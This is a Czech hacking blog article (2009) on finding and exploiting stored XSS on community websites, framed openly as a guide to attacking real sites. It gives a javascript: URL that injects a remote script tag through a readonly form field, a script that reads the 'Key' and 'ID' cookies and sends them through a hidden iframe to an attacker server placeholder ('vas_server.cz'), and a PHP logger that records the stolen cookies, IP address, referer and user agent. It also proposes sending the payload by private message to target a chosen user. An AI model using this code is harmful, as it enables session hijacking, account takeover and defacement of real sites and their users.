Kategorie: IT, Hacking

Kde hledat zranitelnost XSS (Cross-Site Scripting)

To že zranitelnost xss je protlačitelná téměř na každém webu je už profláknutý fakt. Možností kde skulinku pro scriptík hledat je nespočet - sepsal jsem něco málo tipů a triků, které vetšinou bývají účinné!

Také se v textu dozvíte základy editace vzhledu stránky pomocí xss...

Autor: KdoSiOdJinud | Vydáno: 24.1.2009 16:48 | Přečteno: 13261x | Komentářů: 0
Jako první si musíme určit co od vloženého xss budeme chtít, já se rozhoduji mezi třemi možnostmi:
1) vložím js do indexu a změním tím vzhled stránky
2) vložím js do stránky a budu "krást" cookies
3) odešlu js přes soukromou zprávu - dostanu cookies urcité osoby

1:------------------------------------------------------------------------------------------------
Tak první se zaměříme na portály kde se uživatelé registrují a mají možnost přispívat (ať už komentovat fotografie, vkládat příspěvky do diskuse atd.) - jakmile se poslední komentář nebo příspěvek zobrazuje na indexové stránce, je to první bod pro nás (čím víc bodů, tím lehčí editace vzhledu :o) stránky )

Dejme tomu že se na indexu zobrazuje posledních 5 komentářů k fotografiim. Komentář se zobrazuje ve tvaru:

kdo_komentuje » koho_komentuje: samotny_vlozeny_komentar

Formulář pro vložení komentáře:


//pole s textem Baruska vypadá takto:
// < input name="od_jmeno" id="od_jmeno" value="baruska" readonly="readonly" type="text">

Tzn. že nemůžeme editovat, pro smůlu takovýchto formulářů si stačí buď stránku stáhnout a správně upravit nebo pomoci javascriptu vkládaného do url změnit hodnotu. Takový js by mohl vypadat takto:

javascript: void(document.forms[0].elements[0].value="< script src="odkaz_na_nas_js" > </script> baf");

Proč pouze odkaz na js? Získáme tím možnost script i po uložení komentáře editovat ;o) a to se vyplatí!

Tak se nám povedlo vložit js do formuláře který není ošetřen (nepředpokládá se změna od uživatele) a po odeslání formuláře se hodnota uloží do tohoto tvaru:

< script src="odkaz_na_nas_js" > </script> baf » koho_komentuje: samotny_vlozeny_komentar

Červeně je zákeřný kod který nám povolí další úpravy stránky na které se nachází...

Změna vzhledu stránky

Nebudu to prodlužovat, jednoduše jdou měnit třebas tyto elementy a to takto:
1) najdeme si na stránce element napřílad:
< div id='reklama' > Tady je reklama!</div>

2) vložíme do stránky script:
document.getElementById('reklama').innerHTML = 'Tady byla reklama - ted tu je toto';

3) kocháme se dílem viz nalovu.cz

2:------------------------------------------------------------------------------------------------
Vkládáme script pro krádež cookies:
1) vložíme odkaz pro načtení scriptu z našeho externího js (stejné jako v prvním případě)
2) do externího js vložíme script nejiný od tohoto:

function get_cookie ( cookie_name ){ var results = document.cookie.match ( '(^|;) ?' + cookie_name + '=([^;]*)(;|$)' ); if ( results )return ( unescape ( results[2] ) ); else return null;} var hackpass = (get_cookie( "Key" )); var hackuser = (get_cookie( "ID" )); var obsah='< iframe style="display:none;" src="http://vas_server.cz/post.php?cookie='+hackpass+'&cookies='+hackuser+''; document.write(obsah);

3) na našem serveru vytvoříme php soubor který zpracuje příjem cookies

< ?php $cookie = $_GET['cookie']; $ip = getenv("REMOTE_ADDR"); $ref = getenv("HTTP_REFERER"); $agent = getenv("HTTP_USER_AGENT"); $msg = "\nPage: $ref\nHash: $cookie\nUser: $cookies\nIP Address: $ip\nInfos: $agent"; $soubor = fopen("zaznam.txt", "a+"); fwrite($soubor, "\n".$msg."\n\n"); fclose($soubor); ?>

4) po načtení scriptu se nám odešlou obsahy cookies Key a ID, vše ješte s "bonusem" se uloží do zaznam.txt

3:------------------------------------------------------------------------------------------------
Odeslání scriptu pro krádež cookies přes soukromou zprávu

Zkuste zkřížit předchozí dvě možnosti a máte krásný způsob jak si vybrat čí cookies si vypůjčíte či jen přečtete...

Formulář který je náchylný k útoku:


Výsledek /pouze alert/


xss je velice mocný způsob napadání stránek - mnohdy se podceňuje, ale síla s kterou může být tato metoda použita je veliká. Toto byly pouze příklady, jsou stovky způsobů jak je možné do stránky propašovat xss



Odkazy:
www s příklady xss

Komentáře rss

Pokud hledáte službu či máte dotaz mimo téma článku, využijte prosím sekci Nabídky / poptávky.


Nebyly přidány žádné komentáře.